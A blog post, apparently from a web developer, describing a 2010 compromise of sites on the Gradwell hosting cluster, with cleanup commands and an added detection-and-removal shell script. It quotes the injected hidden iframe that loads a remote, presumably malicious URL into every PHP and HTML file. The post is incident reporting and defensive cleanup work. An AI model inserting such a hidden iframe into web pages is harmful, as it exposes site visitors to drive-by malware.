I woke up this morning to find all my clients' sites hosted at Gradwell have been hacked.
A quick poke around on domainsbyip.com shows that many other sites hosted on Gradwell's cluster have been similarly altered.
The hacker has added some HTML for a hidden iframe which points to a remote site. Presumably this site serves some sort of drive-by download attack.
Here's the code that is either prepended or appended to all .php and .html files:
<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/" style="display:none"></iframe>
I cleaned up the files as soon as I noticed the attack with this one-liner:
find . \( -name '*.php' -o -name '*.html' \) -print0 | xargs -0 perl -pi -e 's{<iframe src="http://gaccess\.dynsite\.net/blog/wp-content/0wn3d/" style="display:none"></iframe>}{}g'
(NB: this should all be on one line)
The files were re-infected an hour or so later. Re-infection seems to have stopped now.
The attacker evidently has access to the entire home directory - not just the Apache web root - as library files outside the web root were also affected.
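Scanning the whole home directory for the injected iframe, counting hits (useful for spotting re-infection) and stripping it with a backup of each file, as an added shell example that is not code from the original post. It assumes POSIX sh with find, grep and sed; the only site-specific value is the iframe string quoted above, and the sample tree built by make_sample_tree is constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): find and strip the injected
# iframe across a whole directory tree, not just the web root.
# Assumes POSIX sh plus find, grep and sed; the only site-specific value is
# the iframe string quoted in the post.

IFRAME='<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/" style="display:none"></iframe>'

# list_infected DIR
# Print every .php/.html file under DIR that still contains the iframe.
# grep -F matches it as a fixed string, so no regex escaping is needed here.
list_infected() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' \) \
        -exec grep -lF -e "$IFRAME" {} +
}

# count_infected DIR
# Number of infected files; run it periodically (e.g. from cron) and compare
# with the previous count to notice when re-infection starts again.
count_infected() {
    list_infected "$1" | wc -l | tr -d ' '
}

# clean_infected DIR
# Keep a .bak copy of each infected file, then rewrite the file with every
# occurrence of the iframe removed. Writing through "> $f" keeps the original
# inode and permissions. Filenames containing a newline are not handled.
clean_infected() {
    list_infected "$1" | while IFS= read -r f; do
        cp -p "$f" "$f.bak" &&
        sed 's|<iframe src="http://gaccess\.dynsite\.net/blog/wp-content/0wn3d/" style="display:none"></iframe>||g' \
            "$f.bak" > "$f"
    done
}

# make_sample_tree DIR
# Build a constructed sample home directory for trying the functions out:
# one page with the iframe prepended, one library file outside public_html
# with it appended, and two clean files.
make_sample_tree() {
    mkdir -p "$1/public_html" "$1/lib"
    printf '%s\n<html><body>Hello</body></html>\n' "$IFRAME" > "$1/public_html/index.html"
    printf '<?php echo "clean"; ?>\n' > "$1/public_html/clean.php"
    printf 'body { color: black; }\n' > "$1/public_html/style.css"
    printf '<?php\nfunction db_connect() {}\n%s' "$IFRAME" > "$1/lib/db.php"
}

# Usage: . ./cleanup.sh; count_infected "$HOME"; clean_infected "$HOME"
```

Running count_infected against the whole home directory rather than the document root is the point: the post notes that library files outside the web root were hit too, so a sweep limited to public_html would leave them in place and the iframe would be served again from any include.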
I reported the breach to support and am awaiting the outcome.
Luckily for me, the Primesolid site wasn't affected as I no longer host it at Gradwell.
There's a thread about this on uk.net.providers.gradwell.
Peter Gradwell says: "There must be some sort of exploit in Apache itself, so we are also looking at that, and its permissions model."
Update 2010-12-19 10:03
Gradwell have been hacked again this morning.
Exactly the same attack code has been added to all PHP and HTML files. Timestamps are updated to 2010-12-19 05:22. :-/